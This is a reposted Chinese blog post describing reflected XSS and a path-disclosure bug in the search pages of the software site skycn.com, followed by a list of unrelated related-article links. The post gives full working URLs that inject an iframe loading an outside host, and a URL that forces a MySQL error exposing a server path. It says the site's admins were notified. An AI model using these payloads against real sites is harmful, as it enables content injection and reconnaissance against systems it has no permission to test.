skycn.com的脚本漏洞

2024-05-08 17:05:32
声明:这是我所在的TTL(Try2实验室)组织中ZF大牛写的。服啊。
转载地址:[url]http://zf.try2.org/blog/read.php/56.htm[/url]
以下为转载:
今日在skycn找东西,搜来半天,发现skycn.com的XSS以及skycn的爆路径等等...哈哈
这里本人申明一下,测试只供学习交流,勿用于非法***犯罪!
skycn的服务器采用的apache+php+mysql架构,多镜像负载.
说来也有趣,其实skycn能搞得也就是搜索页面而已,其他的均为生成静态.虽然代码写的很好,也很规范. 但是.....
在search页面中,居然可以这样

[url]http://www.skycn.com/search.php?ss_name=ss_name%3DQQ%0D%7CTencent%0D%7CQQ2005%0D%7CQQ%C8%ED%BC%FE%CF%C2%D4%D8%0D%7C%CC%DA%D1%B6QQ2008%0D%7C%CC%DA%D1%B6%A3%D1%A3%D1%0D%7C%A3%D1%A3%D1%0D%7Cqq%CF%C2%D4%D8%0D%7C2008%20%BA%D8%CB%EA%B0%E6%0D%7COICQ%0D%7CQQ%0D%7CQQ2008%0D%7C%CC%DA%D1%B6QQ%CF%C2%D4%D8%0D%7CQQ08%0D%7C%CC%DA%D1%B8QQ%0D%7C%EB%F8%D1%B6QQ%0D%7C%EB%F8%D1%B8QQ%0D%7C%CF%C2%D4%D8qq%0D%7CQQ2008%20%D5%FD%CA%BD%B0%E6%0D%7C%CC%DA%D1%B6%C8%ED%BC%FE&sf=>[/url]"><iframe src=http://zf.try2.org/ width=800 height=160 frameborder=0 ></iframe> sor=00&Submit=%CB%D1%CB%F7

请看,这里的html


<iframe src=http://www.baidu.com/ width=800 height=160 frameborder=0 ></iframe>

是在sor= 这个查询之前
貌似也可以写到sor= 之后
当然也可以去掉后面的语句

不多说了,把我掌握的贴出来吧.哈哈


[url]http://www.skycn.com/search.php?ss_name=ss_name%3DQQ%0D%7CTencent%0D%7CQQ2005%0D%7CQQ%C8%ED%BC%FE%CF%C2%D4%D8%0D%7C%CC%DA%D1%B6QQ2008%0D%7C%CC%DA%D1%B6%A3%D1%A3%D1%0D%7C%A3%D1%A3%D1%0D%7Cqq%CF%C2%D4%D8%0D%7C2008%20%BA%D8%CB%EA%B0%E6%0D%7COICQ%0D%7CQQ%0D%7CQQ2008%0D%7C%CC%DA%D1%B6QQ%CF%C2%D4%D8%0D%7CQQ08%0D%7C%CC%DA%D1%B8QQ%0D%7C%EB%F8%D1%B6QQ%0D%7C%EB%F8%D1%B8QQ%0D%7C%CF%C2%D4%D8qq%0D%7CQQ2008%20%D5%FD%CA%BD%B0%E6%0D%7C%CC%DA%D1%B6%C8%ED%BC%FE&sf=>[/url]"><iframe src=http://zf.try2.org/ width=800 height=160 frameborder=0 ></iframe>

这是因为 sf= 这个查询..哈哈,貌似补全还是啥做的..哎.

下面这个url,xss依然在.哈哈


[url]http://www.skycn.com/h_search.php?sor=>[/url]'>=>"><iframe src=http://zf.try2.org/ width=800 height=160 frameborder=0 ></iframe>

下面这个url,则爆出路径


[url]http://www.skycn.com/search.php?ss_name=ss_name%3DQQ%0D%7CTencent%0D%7CQQ2005%0D%7CQQ%C8%ED%BC%FE%CF%C2%D4%D8%0D%7C%CC%DA%D1%B6QQ2008%0D%7C%CC%DA%D1%B6%A3%D1%A3%D1%0D%7C%A3%D1%A3%D1%0D%7Cqq%CF%C2%D4%D8%0D%7C2008%20%BA%D8%CB%EA%B0%E6%0D%7COICQ%0D%7CQQ%0D%7CQQ2008%0D%7C%CC%DA%D1%B6QQ%CF%C2%D4%D8%0D%7CQQ08%0D%7C%CC%DA%D1%B8QQ%0D%7C%EB%F8%D1%B6QQ%0D%7C%EB%F8%D1%B8QQ%0D%7C%CF%C2%D4%D8qq%0D%7CQQ2008%20%D5%FD%CA%BD%B0%E6%0D%7C%CC%DA%D1%B6%C8%ED%BC%FE&sor=00&get=[/url]'&az=2

上面的url返回了一条信息


Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/work/web/skycn/include/v3_db.php on line 60

其实,思路对了,基本也就可以xx了.

这个也就写到这里吧,发布之前,也已经email通知对方管理员了.
希望尽快解决漏洞,以免造成不必要的麻烦.

嘿嘿,转载请贴本站地址~~~~~~                                                                                                                                                                                                                                          by @feng@

转载于:https://blog.51cto.com/cince/128121

skycn.com的脚本漏洞相关推荐

  1. Asp网站脚本漏洞的安全防范

    从一个注入点到系统权限的过程.当然,这只是一个例子,在真正的过程中还有很多变化的,我主要通过这个例子来演示一下网络******的过程,接下来我们就采用相应的方法进行防范. (1)首先我们从安装iis6 ...

  2. 使用Dreamweaver挖掘脚本漏洞

    多动脑,方便的方法会有很多 今天在站长站上闲逛时看到了冠龙的这套程序,想想自己刚注意到这套程序的时候还是看手册上刚刚提出Cookie注入的概念,可以说这套程序对我当初学习Cookie注入帮助也是很大的 ...

  3. linux脚本漏洞,Silver Peak VX跨站脚本漏洞(CVE-2014-2975)

    发布日期:2014-07-28 更新日期:2014-07-30 受影响系统: silver peak Silver Peak VX 描述: ------------------------------ ...

  4. Windows系统漏洞学习总结

    Windows系统常见漏洞分析 由于windows NT/2000操作系统的普及率和市场占有率比较高,所以很容易使它成为很多黑客攻击的目标.目前,Windows NT/2000最主要的漏洞有Unico ...

  5. 【安全漏洞】Emissary 的SSRF漏洞(CVE-2021-32639)发现过程

    导语:通过在Emissary项目上运行标准的CodeQL查询集,我发现了之前报告的任意文件泄露(CVE-2021-32093). 通过在Emissary项目上运行标准的CodeQL查询集,我发现了之前 ...

  6. ***脚本***普及

    作者:Msnh4ck(晓华)  版权所有:岁月联盟 www.syue.com 脚本***只是***测试中的其中一环,按技术难度划分来说也是最初级的,当然这类***任务交由具有一定***经验的Web** ...

  7. 矩阵对抗与漏洞补丁201001(第4期)

    下载地址: http://down.51cto.com/data/59446 http://www.cate100.com/orange/juzhenduikang201001-4.pdf 目录 写在 ...

  8. Android 应用安全性改进: 全面助力打造 零漏洞 应用

    作者 / Patrick Mutchler 和 Meghan Kelly, Android 安全和隐私团队 帮助 Android 应用开发者构建 "零漏洞" 的安全应用有助于推动整 ...

  9. thinkphp日志泄漏漏洞_【Windows高危漏洞预警】CVE20200601,影响关键加密功能

    一.事件报告 2020年伊始,NSA发现了一个影响Microsoft Windows加密功能的严重漏洞(CVE-2020-0601).证书验证漏洞允许攻击者破坏Windows验证加密信任的方式,并且可 ...

最新文章

  1. 64位Ubuntu上编译32位程序
  2. python中关键字 表示空类型_Python小知识:如何在Python 3中转换数据类型
  3. Python的弱引用
  4. 关于页面动态添加控件(转)
  5. CF1305D Kuroni and the Celebration
  6. 初学Spring Boot
  7. C# Speech学习笔记(三)
  8. Sklearn专题实战——数据处理+模型构建+网格搜索+保存(提取)模型
  9. 自学python3 最好的入门书籍-学习python3入门书籍选哪些?
  10. 结合CRT与欧拉定理高阶幂求余
  11. LocalBroadcastManager分析
  12. to teacher eulogy
  13. 我的第一个C语言:用点阵显示出我的名字拼音首字母。
  14. 学生个人网页设计作品:旅游网页设计与实现——成都旅游网站4个页HTML+CSS web前端网页设计期末课程大作业 学生DW静态网页设计 学生个人网页设计作品
  15. 【学习笔记】seckill-秒杀项目--(8)页面优化
  16. 应届生年薪 40w 在杭州可以过上什么样的生活?
  17. 苹果cmsv10仿电影淘淘PC+WAP爱看的高端免费模板
  18. 例13.14 将一组数据保存在字符数组中。
  19. Linux shell:fsck命令使用方法
  20. 关于电商运营的XMind思维导图

热门文章

  1. 迭代硬阈值(IHT)的补充说明
  2. ABB机器人利用激光测距传感器求与机器人法兰Z向夹角
  3. 洛谷P1166 打保龄球(模拟)
  4. nolo手柄配对不上_nolo手柄怎么纠正
  5. 硕士论文查重一般多少时间?
  6. css实现比较细的边框
  7. NUC972---tar压缩解压命令
  8. Joomla建站教程:Joomla建站存在的误区
  9. 【TVM系列二】TVM介绍
  10. 一木.溪桥---Python数据分析之Jupyter